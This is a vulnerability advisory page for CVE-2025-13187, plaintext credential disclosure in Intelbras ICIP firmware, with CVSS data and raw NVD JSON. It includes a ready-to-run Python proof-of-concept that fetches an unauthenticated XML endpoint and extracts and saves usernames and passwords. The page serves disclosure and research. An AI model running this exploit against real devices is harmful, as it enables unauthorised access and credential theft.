Security Vulnerability Report
中文
CVE-2025-13187 CVSS 5.3 MEDIUM

CVE-2025-13187

Published: 2025-11-14 22:15:45
Last Modified: 2026-02-04 20:46:58

Description

A security vulnerability has been detected in Intelbras ICIP 2.0.20. Affected is an unknown function of the file /xml/sistema/acessodeusuario.xml. Such manipulation of the argument NomeUsuario/SenhaAcess leads to unprotected storage of credentials. The attack may be launched remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:intelbras:icip_30_firmware:2.0.20:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:intelbras:icip_30:-:*:*:*:*:*:*:* - NOT VULNERABLE
Intelbras ICIP 2.0.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13187 PoC - Intelbras ICIP Plaintext Credentials Disclosure # Affected: Intelbras ICIP 2.0.20 # File: /xml/sistema/acessodeusuario.xml import requests import sys import re def exploit_cve_2025_13187(target_url): """ Exploit for CVE-2025-13187 - Intelbras ICIP plaintext credentials disclosure """ print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting CVE-2025-13187...\n") # Target the vulnerable XML endpoint vuln_url = f"{target_url.rstrip('/')}/xml/sistema/acessodeusuario.xml" try: # Send HTTP GET request without authentication response = requests.get(vuln_url, timeout=10) if response.status_code == 200: print("[+] Successfully accessed vulnerable endpoint!") print(f"[+] Response length: {len(response.text)} bytes\n") # Parse and extract credentials content = response.text # Extract usernames (NomeUsuario) usernames = re.findall(r'<NomeUsuario>([^<]+)</NomeUsuario>', content) # Extract passwords (SenhaAcess) passwords = re.findall(r'<SenhaAcess>([^<]+)</SenhaAcess>', content) if usernames or passwords: print("[+] Credentials Found:") print("-" * 50) for i, (user, pwd) in enumerate(zip(usernames, passwords)): print(f" [{i+1}] Username: {user}") print(f" Password: {pwd}") print() # Save to file with open('credentials.txt', 'w') as f: f.write(f"CVE-2025-13187 Exploit Results\n") f.write(f"Target: {target_url}\n") f.write("=" * 50 + "\n") for user, pwd in zip(usernames, passwords): f.write(f"Username: {user}\nPassword: {pwd}\n\n") print("[+] Credentials saved to credentials.txt") else: print("[-] No credentials found in response") print("Response preview:") print(content[:500]) else: print(f"[-] Failed to access endpoint. Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") except Exception as e: print(f"[-] Unexpected error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-13187.py <target_url>") print("Example: python cve-2025-13187.py http://192.168.1.100:8080") sys.exit(1) target = sys.argv[1] exploit_cve_2025_13187(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13187", "sourceIdentifier": "[email protected]", "published": "2025-11-14T22:15:45.287", "lastModified": "2026-02-04T20:46:57.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Intelbras ICIP 2.0.20. Affected is an unknown function of the file /xml/sistema/acessodeusuario.xml. Such manipulation of the argument NomeUsuario/SenhaAcess leads to unprotected storage of credentials. The attack may be launched remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-255"}, {"lang": "en", "value": "CWE-256"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:intelbras:icip_30_firmware:2.0.20:*:*:*:*:*:*:*", "matchCriteriaId": "534CF2C3-3957-45B3-9708-D9A2E627F6DE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:intelbras:icip_30:-:*:*:*:*:*:*:*", "matchCriteriaId": "8B7F6516-302F-4608-B839-4EC8930EA84D"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.332475", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332475", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.685522", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.notion.so/eldruin/Intelbras-ICIP-Plaintext-Admin-Credentials-Disclosure-29b27474cccb80ff943ff2776d03d7cd", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.notion.so/eldruin/Intelbras-ICIP-Plaintext-Admin-Credentials-Disclosure-CVE ... (truncated)